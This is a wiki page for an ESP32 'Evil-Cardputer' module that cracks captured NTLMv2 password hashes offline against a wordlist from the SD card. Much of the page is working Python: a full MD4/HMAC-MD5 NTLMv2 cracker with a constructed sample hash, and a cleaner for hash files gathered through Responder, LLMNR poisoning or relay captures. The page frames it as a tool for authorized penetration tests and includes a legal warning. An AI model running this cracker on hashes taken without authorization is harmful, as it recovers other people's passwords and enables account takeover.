
crackntlmv2

7h30th3r0n3 edited this page Jan 21, 2026 · 1 revision

🔐 Crack NTLMv2 (Offline)

Embedded NTLMv2 offline password cracking engine for Evil-Cardputer.
Optimized for low RAM, SD-based wordlists, and real-time UI feedback.


📖 Overview

This module implements an offline NTLMv2 password cracking engine directly on the ESP32 (M5Stack Cardputer).

It is designed to process NTLMv2 challenge-response hashes previously captured via legitimate security assessments (e.g. SMB relay, Responder, LLMNR poisoning).

The cracking process is entirely offline: no authentication attempts are sent to the target system.


🎯 Supported Hash Format

Each line in ntlm_hashes.txt must follow the standard NTLMv2 format:

username::DOMAIN:SERVER_CHALLENGE:NT_PROOF:NTLMv2_BLOB

Example:

alice::CORP:1122334455667788:9f1c...e42a:0101000000000000...

🧠 How NTLMv2 Works (Simplified)

  1. Password → UTF-16LE → MD4 → NT Hash
  2. NT Hash + (USERNAME + DOMAIN) → HMAC-MD5 → NTLMv2 Key
  3. NTLMv2 Key + (ServerChallenge || Blob) → HMAC-MD5
  4. Result compared to captured NT Proof

If the computed proof matches the captured one, the password is valid.
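The four steps above, carried through in working code. This is an added Python example, not code from the Evil-Cardputer firmware (which is C++ for the ESP32): MD4 is implemented in pure Python because hashlib's MD4 is frequently unavailable on OpenSSL 3 builds, and the sample capture line is generated from a constructed challenge, a constructed minimal blob and a known password so the whole thing runs offline. One detail MS-NLMP fixes that the step list leaves implicit: in step 2 only the user name is uppercased, the domain keeps its case.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

_MASK = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Pure Python so the example runs where hashlib.new('md4')
    is missing; fine for a demo, far too slow for real cracking."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)   # round-2 word order
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)   # round-3 word order
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        aa, bb, cc, dd = a, b, c, d
        # Each step rewrites one register; rotating (a, b, c, d) -> (d, new, b, c)
        # reproduces the RFC's a/d/c/b order without spelling out 48 steps.
        for i in range(16):                             # round 1, F = (x&y)|(~x&z)
            f = (b & c) | (~b & d)
            a, b, c, d = d, _lrot((a + f + X[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                             # round 2, G = majority
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _lrot((a + g + X[r2[i]] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                             # round 3, H = x^y^z
            h = b ^ c ^ d
            a, b, c, d = d, _lrot((a + h + X[r3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """Step 1: Password -> UTF-16LE -> MD4 -> NT hash."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """Step 2 (NTOWFv2): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain,
    as UTF-16LE. MS-NLMP uppercases only the user name."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """Step 3: HMAC-MD5 over ServerChallenge || Blob."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_line(line: str):
    """username::DOMAIN:SERVER_CHALLENGE:NT_PROOF:NTLMv2_BLOB -> decoded fields."""
    user, empty, domain, chal, proof, blob = line.strip().split(":")
    if empty != "":
        raise ValueError("expected '::' after the user name")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack_line(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Step 4 over a wordlist: return the candidate whose proof matches, else None."""
    user, domain, chal, captured, blob = parse_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if hmac.compare_digest(nt_proof(ntlmv2_key(candidate, user, domain), chal, blob), captured):
            return candidate
    return None


def make_sample_line(user: str, domain: str, password: str) -> str:
    """Constructed fixture: a capture line for a known password, using a fixed
    server challenge and a minimal blob. Real blobs carry a timestamp, client
    challenge and target info after the 0101000000000000 header."""
    challenge = bytes.fromhex("1122334455667788")                 # constructed
    blob = bytes.fromhex("0101000000000000") + bytes(range(16))   # constructed
    proof = nt_proof(ntlmv2_key(password, user, domain), challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    sample = make_sample_line("alice", "CORP", "Summer2024!")
    print(sample)
    print(crack_line(sample, ["letmein", "Summer2024!", "Winter2023!"]))  # Summer2024!
```

Every candidate costs one MD4 and two HMAC-MD5 computations (three MD5 blocks each), which is why the firmware's list above concentrates on a lean MD4 and an allocation-free HMAC-MD5: that inner loop is the whole hashrate.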


⚙️ Implementation Details

  • Custom MD4 implementation (NT hash)
  • Ultra-light MD5 optimized for ESP32
  • Optimized HMAC-MD5 (no heap churn)
  • Minimal dynamic allocations (low RAM footprint)
  • Wordlist streamed line-by-line from SD card

All cryptographic operations are performed locally on the device.


📂 Files & Storage

Path                          Purpose
/evil/NTLM/ntlm_hashes.txt    Captured NTLMv2 hashes
/evil/NTLM/ntlm_wordlist.txt  Password wordlist
/evil/NTLM/ntlm_found.txt     Recovered credentials

If files do not exist, default structures are automatically created.


🖥️ User Interface

The cracking UI provides real-time feedback:

  • Current user being tested
  • Number of passwords tried
  • Progress bar (wordlist position)
  • Hashrate (H/s)
  • Immediate success / failure feedback

Controls:

  • ENTER: skip current user
  • BACKSPACE: abort cracking process

🧹 NTLMv2 Hash Cleaner

A dedicated cleanup utility is included to sanitize hash files:

  • Removes duplicate user::domain entries
  • Filters malformed or invalid lines
  • Uses 64-bit FNV-1a hashing (low RAM)
  • Live progress UI + cancel support

This is especially useful after large Responder or relay captures.
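The same cleanup logic written out in Python as an added example (not the firmware's own cleaner): malformed lines are rejected by a field-shape check, and duplicates are detected by keeping only a 64-bit FNV-1a hash of each user::domain key instead of the key string itself, which is what keeps the seen-set small on a device with little RAM. Treating user and domain as case-insensitive for de-duplication is this example's assumption; the sample lines are constructed.

```python
import re
from typing import Iterable, List, Tuple

FNV64_OFFSET = 0xCBF29CE484222325
FNV64_PRIME = 0x100000001B3
_HEX = re.compile(r"^[0-9a-fA-F]+$")


def fnv1a64(data: bytes) -> int:
    """64-bit FNV-1a: xor the byte in, then multiply by the prime, mod 2^64."""
    h = FNV64_OFFSET
    for byte in data:
        h ^= byte
        h = (h * FNV64_PRIME) & 0xFFFFFFFFFFFFFFFF
    return h


def is_valid_line(line: str) -> bool:
    """Shape check for username::DOMAIN:SERVER_CHALLENGE:NT_PROOF:NTLMv2_BLOB:
    6 colon-separated fields, empty second field, 8-byte challenge, 16-byte proof,
    non-empty even-length hex blob."""
    parts = line.split(":")
    if len(parts) != 6:
        return False
    user, empty, domain, chal, proof, blob = parts
    return (user != "" and empty == "" and domain != ""
            and len(chal) == 16 and bool(_HEX.match(chal))
            and len(proof) == 32 and bool(_HEX.match(proof))
            and len(blob) >= 2 and len(blob) % 2 == 0 and bool(_HEX.match(blob)))


def clean_hashes(lines: Iterable[str]) -> Tuple[List[str], int, int]:
    """Return (kept lines, duplicates dropped, malformed dropped). The first
    capture of each account wins; later captures of the same user::domain are
    redundant for cracking because any one of them verifies the password."""
    seen = set()                    # 64-bit ints only, never the key strings
    kept, dups, bad = [], 0, 0
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if not is_valid_line(line):
            bad += 1
            continue
        user, _, domain = line.split(":", 3)[:3]
        # Assumption: Windows treats user and domain names case-insensitively.
        key = fnv1a64(f"{user.lower()}::{domain.lower()}".encode("utf-8"))
        if key in seen:             # 64-bit collision odds are negligible at wordlist scale
            dups += 1
            continue
        seen.add(key)
        kept.append(line)
    return kept, dups, bad


# Constructed sample capture file: two captures of alice, one of bob, two broken lines.
SAMPLE_LINES = [
    "alice::CORP:1122334455667788:" + "9f" * 16 + ":0101000000000000aabbccdd",
    "alice::corp:8877665544332211:" + "e4" * 16 + ":0101000000000000eeff0011",  # same account again
    "bob::CORP:0011223344556677:" + "3c" * 16 + ":0101000000000000a1b2c3d4",
    "carol::CORP:0011223344556677:" + "3c" * 16,                                # blob missing
    "dave::CORP:zz11223344556677:" + "3c" * 16 + ":0101000000000000a1b2c3d4",   # non-hex challenge
    "",
]


if __name__ == "__main__":
    kept, dups, bad = clean_hashes(SAMPLE_LINES)
    print(f"kept={len(kept)} duplicates={dups} malformed={bad}")  # kept=2 duplicates=1 malformed=2
    for entry in kept:
        print(entry)
```

Running the cleaner before the cracker also shortens the cracking run itself: each surviving line is one more full pass over the wordlist, so every duplicate removed is a whole wordlist pass saved.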


⚠️ Limitations

  • Wordlist-based (no brute-force masks)
  • ESP32 performance ≪ GPU / CPU rigs
  • Best suited for weak / reused passwords

This module is intended for:

  • Field validation
  • Quick wins during engagements
  • Educational demonstrations

❓ FAQ

Is this an online attack?

No. All cracking is done offline against previously captured hashes.

Does this replace hashcat?

No. This is not a replacement for GPU cracking tools. It complements them for portability and demonstrations.

Why run this on an ESP32?

To demonstrate that weak passwords remain weak — even on constrained hardware.


⚠️ Legal Warning

⚠️ WARNING

This module processes authentication material.

Use it only on systems you own or have explicit authorization to test.

Unauthorized use may violate local laws and company policies.

📚 References

  • MS-NLMP: NTLM Authentication Protocol
  • RFC 1320 — MD4 Message-Digest Algorithm
  • RFC 2104 — HMAC
  • Responder / WPAD capture techniques

NTLMv2 was designed to be stronger than NTLM — but passwords remain the weakest link.
